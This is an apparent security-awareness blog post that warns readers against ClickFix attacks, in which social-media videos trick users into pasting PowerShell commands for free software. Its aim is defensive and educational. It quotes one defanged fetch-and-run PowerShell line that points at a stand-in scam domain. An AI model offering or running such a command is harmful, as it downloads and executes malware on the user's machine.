I have a simple request: Please stop falling for ClickFix attacks.
I realize not everyone knows what that means, but that’s why I’m here to help you. Essentially, you’re being manipulated by your clipboard and your need for free stuff. You’re literally being fooled into hacking yourself.
What is ClickFix?
ClickFix is a social engineering attack that plays on a human’s desire to trust. A need to believe everything they read or see online. It can also be a clipboard level attack because you are trusting what is being pasted from your clipboard. Either way, the exploit flows through you, the end user.
It starts like this:
Someone on TikTok or Instagram posts a video claiming you can get “Free Photoshop” or “Spotify Premium” with a simple “hack” through your command prompt. They drop a single PowerShell command and say, “Just paste this and it’s done.”
The video is always very catchy. Music, some AI generated voice. A sample of the code being pasted and run. The result always looks simple and easy. Too good to be true because it always is. You are being convinced to paste in something that will flood your system with malicious code. The comments and likes on the videos are usually bots meant to make it look safe.
The most popular version of the attack usually looks something like this:
iex (irm hxxps://scamdomain[.]com/spotify)The attack can also look like a simple instruction list. “Click here to copy the code” buttons that copy a payload you might not even be aware of, and when you paste it, all hell breaks loose.
Aftermath and Reality
That’s it: one simple line of code, and you just handed hackers full control of your PC. And sure, they might turn your machine into a bot, but the most likely target is your private data.
Best case scenario? You get hit with some kind of RAT or some really lame malware. Worst case? You get hit with some kind of ransomware, and you are locked out of your machine unless you agree to pay the ransom.
Either way, you are looking at a reality where your data is completely compromised. Info stealers are everywhere. Your data is valuable even if you don’t think so. Once you are compromised, you can at a minimum assume:
- Your passwords? Stolen.
- Your crypto? Stolen.
- Your emails? Compromised.
- Your contacts list? Exported.
You have to be vigilant because there is no app that will make you more aware.
A TikTok user sharing a video that would likely end in your PC being infected with an info stealer. Credit to CERN for the image.
Prevention and Education
So what is happening? Simply put, that one line of code connects to a remote server, downloads a script, and runs it on your machine. It could be malware, info stealers, backdoors. It could be anything. Something that is usually difficult to execute on a target’s system is literally hand delivered by you.
So how do you prevent the attack?
- Don’t paste things into your command prompt.
- Don’t paste things into your command prompt.
- Don’t paste things into your command prompt.
Three simple strategies to prevent you from being manipulated, hacked, and turned into a data farm.
You didn’t listen to rules 1-3? You ran a command already? You didn’t get free Spotify Premium for life?
If you already ran a command, you might be out of luck. In the event you are still early, I would highly recommend a few basic mitigation steps:
- Disconnect from the internet
- Run a full malware scan using a trusted tool
- MalwareBytes or Microsoft’s MSRT
- Change your passwords everywhere from another device
- Hopefully you are using a password manager
Once again, the most vulnerable part of a PC is the user. Users don’t ask questions and run on impulse. We want to believe that we are privy to something special, something undiscovered. So we trust what we are told.
Do not paste commands from random videos online. Ever. If you don’t know what it does, don’t run it!
More Resources
If you are unsure about something you were told to paste or want to learn more you can check out a fantastic educational site run by John Hammond and The Hagg. They do an incredible job explaining things more in depth and give attack examples.
You can also use the ClickGrab Analyzer provided by The Hagg found here: https://clickgrab.streamlit.app/ it will let you know if the url is malicious.